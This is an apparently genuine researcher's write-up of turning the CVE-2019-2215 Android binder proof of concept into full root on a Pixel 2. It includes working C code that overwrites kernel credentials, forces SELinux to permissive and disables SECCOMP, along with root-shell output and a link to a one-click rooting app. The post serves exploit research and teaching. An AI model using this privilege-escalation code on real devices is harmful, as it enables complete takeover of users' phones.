Tailoring CVE-2019-2215 to Achieve Root

When I heard about the emergency disclosure of CVE-2019-2215 by Project Zero, I decided to replicate the exploit on my local device to see it in action. I happened to have a vulnerable Pixel 2 running the exact same kernel version as my main device (don’t hack me). All I needed to do was compile the exploit and run it over ADB. I downloaded the latest Android NDK and compiled the proof of concept:

[grant ~/Downloads/android-ndk-r20 >> ./toolchains/llvm/prebuilt/darwin-x86_64/bin/aarch64-linux-android29-clang -o poc ../poc.c
[grant ~/Downloads/android-ndk-r20 >> adb push poc /data/local/tmp/poc
poc: 1 file pushed. 0.8 MB/s (22528 bytes in 0.026s)

I ran it on my device and confirmed that I was able to reproduce Maddie Stone’s screenshot exactly.

The base PoC left us with a full kernel read/write primitive, essentially game over for the system’s security, but left achieving root as an exercise for the reader. This raises the question: what does “root” really mean on a modern Android system? To answer this, we must first understand how Android enforces its security policies.

Android protects against malicious applications through a layered enforcement approach. Here are the major players:

Android Security Hierarchy

Discretionary Access Control (DAC) - UNIX permissions (user/group IDs, R/W/X object permissions)
Mandatory Access Control (MAC) - Type enforcement through SELinux/SEAndroid (effectively a whitelist of who can talk to whom and how)
Linux Capabilities (CAP) - Breaks up the all-powerful root user into permission slices (CAP_XYZ)
SECCOMP - Allows system calls to be filtered/blocked, effectively limiting the kernel attack surface
Android Middleware - Typical Android app permissions as defined in AndroidManifest.xml such as android.permission.INTERNET (usually enforced by system_server)

To get a full root shell we’d need to bypass each layer of enforcement (with the exception of the Android middleware, since the exploit targets binder, which doesn’t require any middleware checks to access). On a modern Android system, this is a significant undertaking without a kernel vulnerability. But with an app-accessible kernel exploit, we can bypass or disable all of these layers with relative ease. For each task on a system, the Linux kernel keeps track of its state in the task_struct structure. This state includes security-relevant details such as the task’s user IDs, its SELinux context, the capabilities it holds, whether SECCOMP is enabled, and many others. If we can target a specific task_struct with our R/W primitive, we can change these security-sensitive values to whatever we please. For instance, if we target our own task (the current process), we can effectively achieve an Escalation of Privilege (EoP).
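Most of this per-task state is also visible from userspace, which makes it easy to check what each later step actually changed. The following is a minimal sketch, not part of the PoC: it reads the Uid, Gid, CapEff, CapBnd, and Seccomp lines from /proc/self/status. The function names status_field and print_own_security_state are made up for this illustration, and the SELinux context is not in this file (it lives in /proc/self/attr/current).

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Copy the value of a "Key:\tvalue" line out of /proc/<pid>/status-style
 * text. Returns 0 on success, -1 if the key is not present.
 * (Hypothetical helper, not part of the original PoC.)
 */
int status_field(const char *text, const char *key, char *out, size_t outlen)
{
    assert(text && key && out && outlen > 0);
    size_t keylen = strlen(key);

    for (const char *line = text; line && *line; ) {
        if (strncmp(line, key, keylen) == 0 && line[keylen] == ':') {
            const char *v = line + keylen + 1;
            while (*v == ' ' || *v == '\t')
                v++;                          /* skip padding after the colon */
            size_t n = strcspn(v, "\n");      /* value runs to end of line */
            if (n >= outlen)
                n = outlen - 1;
            memcpy(out, v, n);
            out[n] = '\0';
            return 0;
        }
        line = strchr(line, '\n');            /* advance to the next line */
        if (line)
            line++;
    }
    return -1;
}

/* Print the DAC, CAP, and SECCOMP state of the calling process. */
int print_own_security_state(void)
{
    static const char *const keys[] = { "Uid", "Gid", "CapEff", "CapBnd", "Seccomp" };
    char buf[8192], val[128];
    FILE *f = fopen("/proc/self/status", "r");

    if (!f)
        return -1;
    size_t n = fread(buf, 1, sizeof(buf) - 1, f);
    fclose(f);
    buf[n] = '\0';

    for (size_t i = 0; i < sizeof(keys) / sizeof(keys[0]); i++)
        if (status_field(buf, keys[i], val, sizeof(val)) == 0)
            printf("%-8s %s\n", keys[i], val);
    return 0;
}
```

Calling print_own_security_state() before and after each escalation step gives a quick userspace view of which layer has been dealt with.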

Escalating to Root

Bypassing DAC and CAP

With a pointer to our current task_struct, all we need is the correct offset from the start to our current process credentials. We can then read the pointer value and use it in subsequent calls to poke at our credentials.

The cred struct in Linux has all of the goodies we’re looking to change to escalate our current process. Here is the source code taken from the latest version of the Linux kernel.

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
} __randomize_layout;
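Before looking at live memory, the field offsets can be predicted from the definition. The sketch below is a userspace mirror of the struct under assumptions that are mine rather than the kernel’s: CONFIG_DEBUG_CREDENTIALS is off, CONFIG_KEYS and CONFIG_SECURITY are on, the layout is not randomized, kernel_cap_t is two 32-bit words, and pointers are 64 bits wide. The names cred_mirror and print_cred_offsets are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Stand-in for kernel_cap_t: two 32-bit words (assumption for this kernel). */
typedef struct { uint32_t cap[2]; } cap_mirror_t;

/* Userspace mirror of struct cred; pointers are modeled as 64-bit integers. */
struct cred_mirror {
    int32_t       usage;
    uint32_t      uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
    uint32_t      securebits;
    cap_mirror_t  cap_inheritable, cap_permitted, cap_effective,
                  cap_bset, cap_ambient;
    unsigned char jit_keyring;
    _Alignas(8) uint64_t session_keyring;   /* pointer: 8-byte aligned */
    uint64_t      process_keyring, thread_keyring, request_key_auth;
    uint64_t      security;
    uint64_t      user, user_ns, group_info;
};

/* Fail the build if the mirror disagrees with the expected offsets. */
static_assert(offsetof(struct cred_mirror, uid) == 0x04, "uid offset");
static_assert(offsetof(struct cred_mirror, securebits) == 0x24, "securebits offset");
static_assert(offsetof(struct cred_mirror, cap_permitted) == 0x30, "cap_permitted offset");
static_assert(offsetof(struct cred_mirror, security) == 0x78, "security offset");

/* Print the offsets that matter for the escalation. */
void print_cred_offsets(void)
{
    printf("uid            0x%02zx\n", offsetof(struct cred_mirror, uid));
    printf("securebits     0x%02zx\n", offsetof(struct cred_mirror, securebits));
    printf("cap_permitted  0x%02zx\n", offsetof(struct cred_mirror, cap_permitted));
    printf("cap_bset       0x%02zx\n", offsetof(struct cred_mirror, cap_bset));
    printf("security       0x%02zx\n", offsetof(struct cred_mirror, security));
}
```

A mirror like this is only a hypothesis about the target’s build configuration, so it should be checked against a real memory dump before anything is written.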

There are a lot of fields of varying sizes that we need to change. Before randomly poking at what we believe to be the right offsets, let’s dump the memory of our credential struct and eyeball it.

[grant ~/Downloads/android-ndk-r20 >> adb shell /data/local/tmp/poc shell
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffea05065700
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffea05065700
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffeaafefc100
current->mm->user_ns == 0xffffff98848af2c8
kernel base is 0xffffff9882880000
&init_task == 0xffffff98848a57d0
init_task.cred == 0xffffff98848b0b08
init->cred
00000000  04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000010  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000030  ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00  |....?.......?...|
00000040  ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00  |....?...........|
00000050  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 80 d4 42 b9 ea ff ff ff  |..........B.....|
00000080  c8 f3 8a 84 98 ff ff ff c8 f2 8a 84 98 ff ff ff  |................|
00000090  78 0a 8b 84 98 ff ff ff 00 00 00 00 00 00 00 00  |x...............|
current->cred == 0xffffffeab30a5b40
Starting as uid 2000
current->cred
00000000  1a 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000010  d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00  |................|
00000020  d0 07 00 00 2f 00 00 00 00 00 00 00 00 00 00 00  |..../...........|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000050  00 00 00 00 00 00 00 00 c0 b6 9d f2 c3 ff ff ff  |........@..2....|
00000060  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000070  00 00 00 00 00 00 00 00 00 29 ce 69 c4 ff ff ff  |................|
00000080  00 50 22 74 c4 ff ff ff c8 f2 aa 14 9e ff ff ff  |...1............|
00000090  00 33 fa 9e c3 ff ff ff 00 00 00 00 00 00 00 00  |................|

Looking at the bottom hexdump, we can start to see some patterns. Our current UID, 2000, is 0x07d0 in hex, which shows up in little-endian byte order as d0 07 00 00. That value repeats eight times right after the first four bytes, which confirms that we have a correct pointer to our task’s credential struct. Here is the same dump, manually reformatted:

~~~ Dump of current->cred ~~~
OFF | VALUE
 0  | 1a000000 // usage
 4  | d0070000 // uid
 8  | d0070000 // gid
 c  | d0070000 // suid
10  | d0070000 // sgid
14  | d0070000 // euid
18  | d0070000 // egid
1c  | d0070000 // fsuid
20  | d0070000 // fsgid
24  | 2f000000 // securebits
28  | 0000000000000000 // cap inh
30  | 0000000000000000 // cap perm
38  | 0000000000000000 // cap eff
40  | c000000000000000 // cap bound
48  | 0000000000000000 // cap ambient
50  | 0000000000000000 // jit keyring
58  | c0b69df2c3ffffff // session keyring
60  | 0000000000000000 // process keyring
68  | 0000000000000000 // thread keyring
70  | 0000000000000000 // request key auth
78  | 0029ce69c4ffffff // cred->security
80  | 00502274c4ffffff // user struct
88  | c8f2aa149effffff // user namespace
90  | 0033fa9ec3ffffff // group info
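The values in the map are written in memory (little-endian) byte order, so they need to be byte-swapped before they read as numbers or pointers. A minimal sketch of that decoding follows; le32 and le64 are helper names chosen for this example, not functions from the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decode 4 bytes in little-endian order, as they appear in the hexdump. */
uint32_t le32(const uint8_t *p)
{
    assert(p != NULL);
    return (uint32_t)p[0]
         | (uint32_t)p[1] << 8
         | (uint32_t)p[2] << 16
         | (uint32_t)p[3] << 24;
}

/* Decode 8 bytes in little-endian order (pointers and capability sets). */
uint64_t le64(const uint8_t *p)
{
    assert(p != NULL);
    return (uint64_t)le32(p) | (uint64_t)le32(p + 4) << 32;
}
```

For example, the bytes d0 07 00 00 decode to 2000, and the cred->security bytes 00 29 ce 69 c4 ff ff ff decode to the kernel pointer 0xffffffc469ce2900.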

With this map, we can begin to become root, first by setting all of our UIDs and GIDs to 0.

uid_t uid = getuid();
unsigned long my_cred = kernel_read_ulong(current_ptr + OFFSET__task_struct__cred);

printf("current->cred == 0x%lx\n", my_cred);

printf("Starting as uid %u\n", uid);
printf("Escalating...\n");

// change IDs to root (there are eight)
for (int i = 0; i < 8; i++)
  kernel_write_uint(my_cred+4 + i*4, 0);

if (getuid() != 0) {
  printf("Something went wrong changing our UID to root!\n");
  exit(1);
}

printf("UIDs changed to root!\n");

Executing a shell from this point demonstrates that we have root… but only the DAC part of it.

...
UIDs changed to root!
Spawning shell!
id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0

Next, we target capabilities. This involves setting every capability bit to 1 and clearing our securebits (init doesn’t have these set, so why should we?).

// reset securebits
kernel_write_uint(my_cred+0x24, 0);

// change capabilities to everything (perm, effective, bounding)
for (int i = 0; i < 3; i++)
  kernel_write_ulong(my_cred+0x30 + i*8, 0x3fffffffffUL);

printf("Capabilities set to ALL\n");
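The constants in this step can be decoded rather than taken on faith. The sketch below assumes the capability and securebits numbering from the Linux UAPI headers (CAP_SETGID = 6, CAP_SETUID = 7, and CAP_AUDIT_READ = 37 as the highest capability on a 4.4 kernel); the function names are invented for this illustration. It shows that 0x3fffffffff is simply "all 38 capability bits set", that the shell’s bounding set of 0xc0 holds only CAP_SETGID and CAP_SETUID, and which flags make up the securebits value 0x2f.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>

#define CAP_LAST_CAP_4_4 37   /* CAP_AUDIT_READ; assumed highest cap on 4.4 */

/* Mask with every capability bit from 0 through last_cap set. */
uint64_t full_cap_mask(unsigned last_cap)
{
    assert(last_cap < 63);
    return (UINT64_C(1) << (last_cap + 1)) - 1;
}

/* Non-zero if capability number cap is present in mask. */
int cap_is_set(uint64_t mask, unsigned cap)
{
    return (int)((mask >> cap) & 1);
}

/* Write the names of the set securebits into out, space separated.
 * Returns the number of characters written (excluding the terminator). */
size_t securebits_describe(uint32_t bits, char *out, size_t outlen)
{
    static const char *const names[8] = {
        "NOROOT", "NOROOT_LOCKED",
        "NO_SETUID_FIXUP", "NO_SETUID_FIXUP_LOCKED",
        "KEEP_CAPS", "KEEP_CAPS_LOCKED",
        "NO_CAP_AMBIENT_RAISE", "NO_CAP_AMBIENT_RAISE_LOCKED",
    };
    size_t used = 0;

    assert(out && outlen > 0);
    out[0] = '\0';
    for (unsigned i = 0; i < 8; i++) {
        if (!(bits & (1u << i)))
            continue;
        int n = snprintf(out + used, outlen - used, "%s%s",
                         used ? " " : "", names[i]);
        if (n < 0 || (size_t)n >= outlen - used) {
            out[used] = '\0';   /* drop a partially written name */
            break;
        }
        used += (size_t)n;
    }
    return used;
}
```

Decoding 0x2f this way shows that the shell’s securebits lock NOROOT and NO_SETUID_FIXUP on, so zeroing the field brings the task back in line with init’s dump, where the field is 0.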

Now our process is technically full root from a stock Linux perspective, but Android’s MAC policy still restricts our root process to whatever the u:r:shell:s0 context is allowed to do.

Disabling SELinux

It is now time to take out the strictest security policy: SELinux. Lower down in the cred struct of our process we see the opaque security pointer at offset 0x78:

...
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
...

This is a pointer to a struct task_security_struct allocated by the selinux_cred_alloc_blank function in security/selinux/hooks.c.

The definition of this struct is as follows:

struct task_security_struct {
	u32 osid;		/* SID prior to last execve */
	u32 sid;		/* current SID */
	u32 exec_sid;		/* exec SID */
	u32 create_sid;		/* fscreate SID */
	u32 keycreate_sid;	/* keycreate SID */
	u32 sockcreate_sid;	/* fscreate SID */
};

We are most interested in the sid field, as this determines the active SELinux context of our process. Let’s set this to another, higher-privileged SID, such as kernel (SID = 1) or init (SID = 7) (initial SID list)!

unsigned long current_cred_security = kernel_read_ulong(my_cred+0x78);

// change SID to kernel
kernel_write_uint(current_cred_security + 4, 1);
printf("[+] SID -> kernel (1)\n");

The exploit works up until we change our SID, at which point our ADB connection hangs. Why does this hang? Changing the SID of a process that is already connected to and communicating with others isn’t guaranteed to work; it depends on the SELinux policy for the target SID. Did it actually change the SID?

walleye:/ $ cat /proc/xxx/attr/current
u:r:kernel:s0
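An SELinux context string has the form user:role:type:level, and the type (the third field) is the part that type enforcement keys on. When checking the result programmatically instead of with cat, a small parser is enough. This is a sketch; selinux_context_type is a hypothetical helper, not a libselinux function.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Extract the type field from a context such as "u:r:kernel:s0".
 * Returns 0 on success, -1 if the string is malformed or out is too small.
 */
int selinux_context_type(const char *ctx, char *out, size_t outlen)
{
    assert(ctx && out && outlen > 0);
    const char *p = ctx;

    /* Skip the user and role fields. */
    for (int i = 0; i < 2; i++) {
        p = strchr(p, ':');
        if (!p)
            return -1;
        p++;
    }

    /* The type runs up to the next colon, newline, or end of string. */
    size_t n = strcspn(p, ":\n");
    if (n == 0 || n >= outlen)
        return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}
```

Feeding it the contents of /proc/self/attr/current before and after the write would show the type moving from shell to kernel.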

It did, but it looks like hoisting ourselves directly from shell to kernel isn’t going to work. We need to take a different approach and disable SELinux outright. Disabling SELinux is a popular technique for Android kernel exploits and is achievable with a kernel R/W primitive. The only caveat is that we need to know the offset of the selinux_enforcing symbol from the kernel base. If we happen to have a working kernel build tree in front of us, we can likely find this symbol using pahole, as mentioned in the original PoC source. But what if we just have a kernel binary?

Recovering selinux_enforcing

I will detail the steps taken to recover this symbol for the Pixel 2 kernel 4.4.177-g83bee1dc48e8. Googling this string leads to a wahoo-kernel repo. From here we can download the Image.lz4-dtb file, which happens to match the kernel I’m running. This file is a compressed kernel image with the device tree appended. Decompressing it gives us a raw kernel image:

[grant ~/Downloads >> lz4 -d Image.lz4-dtb Image
Decompressed : 34 MB  Stream followed by undecodable data at position 14571037
Image.lz4-dtb        : decoded 36238336 bytes
[grant ~/Downloads >> strings Image | grep "Linux version "
Linux version 4.4.177-g83bee1dc48e8 (android-build@abfarm-us-west1-c-0087) (Android (5484270 based on r353983c) clang version 9.0.3 (https://android.googlesource.com/toolchain/clang 745b335211bb9eadfa6aa6301f84715cee4b37c5) (https://android.googlesource.com/toolchain/llvm 60cf23e54e46c807513f7a36d0a7b777920b5881) (based on LLVM 9.0.3svn)) #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019
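The strings and grep check can also be done in code, which is handy when the comparison against the running kernel is automated. Because a raw image is full of NUL bytes, strstr cannot be used on it directly. A minimal sketch, with find_linux_banner being a name made up for this example:

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Return the byte offset of the first "Linux version " banner in a raw
 * kernel image, or -1 if there is none. Works on binary data with NULs.
 */
long find_linux_banner(const unsigned char *buf, size_t len)
{
    static const char needle[] = "Linux version ";
    const size_t nlen = sizeof(needle) - 1;

    assert(buf != NULL || len == 0);
    for (size_t i = 0; i + nlen <= len; i++)
        if (memcmp(buf + i, needle, nlen) == 0)
            return (long)i;
    return -1;
}
```

The string found at that offset can then be compared with the contents of /proc/version on the device.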

Now we need to dig into this and recover the kallsyms table. There is an excellent tool that does all of the complicated steps for you: https://github.com/nforest/droidimg. Cloning and installing the dependencies of droidimg, we run it on our decompressed image:

[grant ~/Downloads/droidimg >> ./vmlinux.py Image
Linux version 4.4.177-g83bee1dc48e8 (android-build@abfarm-us-west1-c-0087) (Android (5484270 based on r353983c) clang version 9.0.3 (https://android.googlesource.com/toolchain/clang 745b335211bb9eadfa6aa6301f84715cee4b37c5) (https://android.googlesource.com/toolchain/llvm 60cf23e54e46c807513f7a36d0a7b777920b5881) (based on LLVM 9.0.3svn)) #1 SMP PREEMPT Mon Jul 22 20:12:03 UTC 2019
[+]kallsyms_arch = arm64
[!]could be offset table...
[!]lookup_address_table error...
[!]get kallsyms error...

We get an error finding the kallsyms table. I suspected it had to do with KASLR, given some notes in the README, so I ran a tool provided by droidimg to fix up the binary for further extraction:

[grant ~/Downloads/droidimg >> gcc -o fix_kaslr_arm64 fix_kaslr_arm64.c
fix_kaslr_arm64.c:265:5: warning: always_inline function might not be inlinable [-Wattributes]
 int main(int argc, char **argv)

[grant ~/Downloads/droidimg >> ./fix_kaslr_arm64 Image Image_kaslr
Original kernel: image_dec, output file: image_dec_kaslr
kern_buf @ 0x7f4105ea2000, mmap_size = 36241408
rela_start = 0xffffff80098d66d0
p->info = 0x0
rela_end = 0xffffff800a0810d8
335004 entries processed

Finally we’re able to get the symbol table:

[grant ~/Downloads/droidimg >> ./vmlinux.py Image_kaslr
Linux version 4.4.177-g83bee1dc48e8 ...
[+]kallsyms_arch = arm64
[+]numsyms: 131603
[+]kallsyms_address_table = 0x11acc00
[+]kallsyms_num = 131603 (131603)
[+]kallsyms_name_table = 0x12ade00
[+]kallsyms_type_table = 0x0
[+]kallsyms_marker_table = 0x1469900
[+]kallsyms_token_table = 0x146aa00
[+]kallsyms_token_index_table = 0x146ae00
[+]kallsyms_start_address = 0xffffff8008080000L
[+]found 9915 symbols in ksymtab
ffffff8008080000 t _head
ffffff8008080000 T _text
...

Scanning through the output symbols, no selinux_enforcing is found! Reading the source code of droidimg shows that it has a special mode that uses Miasm to recover unexported symbols, namely selinux_enforcing. Re-running with Miasm support coughs up our symbol: ffffff800a44e4a8 B selinux_enforcing. Subtracting the address of _head (ffffff8008080000) from this gives us an offset of 0x23ce4a8.
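The arithmetic is worth spelling out, since the same offset is later added to the KASLR-slid kernel base found at runtime. The sketch below parses a symbol line in the format printed above and does both computations. The helper names are hypothetical, and the runtime base used in the usage note is the one printed by the PoC earlier in this post.

```c
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse a line such as "ffffff800a44e4a8 B selinux_enforcing".
 * Returns 0 and stores the address if the line names the wanted symbol.
 */
int parse_symbol_line(const char *line, const char *name, uint64_t *addr)
{
    uint64_t a;
    char type;
    char sym[128];

    assert(line && name && addr);
    if (sscanf(line, "%" SCNx64 " %c %127s", &a, &type, sym) != 3)
        return -1;
    if (strcmp(sym, name) != 0)
        return -1;
    *addr = a;
    return 0;
}

/* Offset of a symbol from the start of the kernel image (_head / _text). */
uint64_t symbol_offset(uint64_t sym_addr, uint64_t image_base)
{
    assert(sym_addr >= image_base);
    return sym_addr - image_base;
}

/* Address of the same symbol once the kernel is loaded at runtime_base. */
uint64_t rebase_symbol(uint64_t runtime_base, uint64_t offset)
{
    return runtime_base + offset;
}
```

With the static addresses above, symbol_offset gives 0x23ce4a8, and rebasing that onto a runtime kernel base of 0xffffff9882880000 places selinux_enforcing at 0xffffff9884c4e4a8 for that boot.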

Finally, we are able to disable SELinux in our exploit:

#define SYMBOL__selinux_enforcing 0x23ce4a8

unsigned int enforcing = kernel_read_uint(kernel_base + SYMBOL__selinux_enforcing);

printf("SELinux status = %u\n", enforcing);

if (enforcing) {
  printf("Setting SELinux to permissive\n");
  kernel_write_uint(kernel_base + SYMBOL__selinux_enforcing, 0);
} else {
  printf("SELinux is already in permissive mode\n");
}

Disabling SECCOMP

When running my initial exploits over ADB, I wasn’t affected by any SECCOMP policies. When I bundled the exploit into an application, commands that worked before stopped doing so. For example, the mount command I was using to create a tmpfs for Magisk on /sbin was no longer mounting. SECCOMP was doing its job, preventing the application and its children from calling any old syscall.

Like our task’s DAC, CAP, and MAC state, SECCOMP also lives in our task_struct as the seccomp inline struct:

struct seccomp {
	int mode;
	struct seccomp_filter *filter;
};

The mode can be either 0 (disabled), SECCOMP_MODE_STRICT, or SECCOMP_MODE_FILTER. SECCOMP is usually used in filter mode, where a (classic) BPF program is executed on each syscall and returns a verdict such as ALLOW or DENY, similar to firewall rules. This program is pointed to by the filter field. Disabling SECCOMP seems as simple as changing the mode to 0, but this just leads to a kernel crash. But why? When SECCOMP is enabled, the kernel also sets the TIF_SECCOMP flag in the task_struct->thread_info.flags field, which the initial syscall entry handlers use to determine whether any filtering needs to take place. Resetting the mode BEFORE resetting this flag leads to a kernel BUG() statement being hit in the __secure_computing function. So to disable SECCOMP outright, the flag is cleared first. Then, to prevent SECCOMP from being copied to child processes on fork(), the mode needs to be cleared (and the filter too).

#define OFFSET__task_struct__thread_info__flags 0 // if CONFIG_THREAD_INFO_IN_TASK is defined

// Grant: SECCOMP isn't enabled when running the poc from ADB, only from app contexts
if (prctl(PR_GET_SECCOMP) != 0) {
  printf("Disabling SECCOMP\n");

  // clear the TIF_SECCOMP flag and everything else :P (feel free to modify this to just clear the single flag)
  // arch/arm64/include/asm/thread_info.h:#define TIF_SECCOMP 11
  kernel_write_ulong(current_ptr + OFFSET__task_struct__thread_info__flags, 0);
  kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa8, 0);
  kernel_write_ulong(current_ptr + OFFSET__task_struct__cred + 0xa0, 0); // this offset was eyeballed

  if (prctl(PR_GET_SECCOMP) != 0) {
    printf("Failed to disable SECCOMP!\n");
    exit(1);
  } else {
    printf("SECCOMP disabled!\n");
  }
} else {
  printf("SECCOMP is already disabled!\n");
}
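The code above zeroes every thread_info flag, which its own comment invites the reader to narrow down. A minimal sketch of clearing only TIF_SECCOMP follows, using the bit number quoted in that comment (11 on arm64). The mask and function names are chosen for this example; the read-modify-write shown in the usage note reuses the PoC’s kernel_read_ulong and kernel_write_ulong helpers and is not atomic with respect to the kernel updating other flags.

```c
#include <assert.h>
#include <limits.h>

#define TIF_SECCOMP       11                     /* arm64 bit number */
#define TIF_SECCOMP_MASK  (1UL << TIF_SECCOMP)

static_assert(TIF_SECCOMP < sizeof(unsigned long) * CHAR_BIT,
              "flag bit must fit in the flags word");

/* Non-zero if the syscall entry path would invoke SECCOMP for this task. */
int has_tif_seccomp(unsigned long flags)
{
    return (flags & TIF_SECCOMP_MASK) != 0;
}

/* Return flags with only TIF_SECCOMP cleared; all other bits are kept. */
unsigned long clear_tif_seccomp(unsigned long flags)
{
    return flags & ~TIF_SECCOMP_MASK;
}
```

In the exploit this would replace the first write with a read of current_ptr + OFFSET__task_struct__thread_info__flags via kernel_read_ulong, followed by a kernel_write_ulong of clear_tif_seccomp(flags) to the same address.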

Finally, with SECCOMP disabled, we have achieved a full root shell:

walleye:/ $ /data/local/tmp/poc
usage: /data/local/tmp/poc [shell|shell_exec]
/data/local/tmp/poc shell - spawns an interactive shell
/data/local/tmp/poc shell_exec "command" - runs the provided command in an escalated shell
1|walleye:/ $ /data/local/tmp/poc shell
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffeaa7e86580
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffeab3991040
current->mm->user_ns == 0xffffff98848af2c8
kernel base is 0xffffff9882880000
current->cred == 0xffffffeaa0223540
Starting as uid 2000
Escalating...
UIDs changed to root!
Capabilities set to ALL
SELinux status = 1
Setting SELinux to permissive
Re-joining the init mount namespace...
Re-joining the init net namespace...
SECCOMP disabled!
Spawning shell!
:/ # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
:/ # getenforce
Permissive

If this kind of exploitation excites you and you want to learn more or practice, there are some very good Linux kernel exploitation CTF problems that I’d recommend you try: Brad Oderberg, suckerusu, StringIPC, and pwnable.kr (Rootkiss/syscall) (plus many more I’m leaving out). Andrey K. has an index of Linux kernel exploitation techniques and talks that you should also check out.

Qu1ckR00t

Once I had a reliable working exploit that I could use over ADB, I decided it would be neat to see the exploit working from an application context. I created Qu1ckR00t (the name is satire) as a one-click rooting application that also YOLO-installs™ Magisk.

Qu1ckR00t is a PROOF OF CONCEPT. It should NOT be used on your personal device with valuable user data. It has only been tested on a Pixel 2. Running it on any other device or kernel will likely lead to a crash or even data loss. DO NOT install extra Magisk environment files or upgrade Magisk if prompted, as this will patch boot, breaking DM-Verity on the next boot and likely leading to data loss when you need to reflash.

The bottom line is that Magisk was NEVER meant to be installed this way and you will really break things without further patches to Magisk itself. That being said, I did all my development on my personal device, but I am a so-called “professional”.

There is nothing novel about Qu1ckR00t, but it is cool to get a little taste of a typical iOS jailbreaking flow on Android. Maybe in the future if OEMs like Samsung completely remove OEM Unlock, this kind of rooting method will return to popularity.

Without further ado, here is the Qu1ckR00t source code: https://github.com/grant-h/qu1ckr00t

Rooting a Pixel 2 with Magisk from an untrusted app using CVE-2019-2215, no OEM unlock needed pic.twitter.com/yGovBluQj5
— Grant Hernandez (@Digital_Cold) October 9, 2019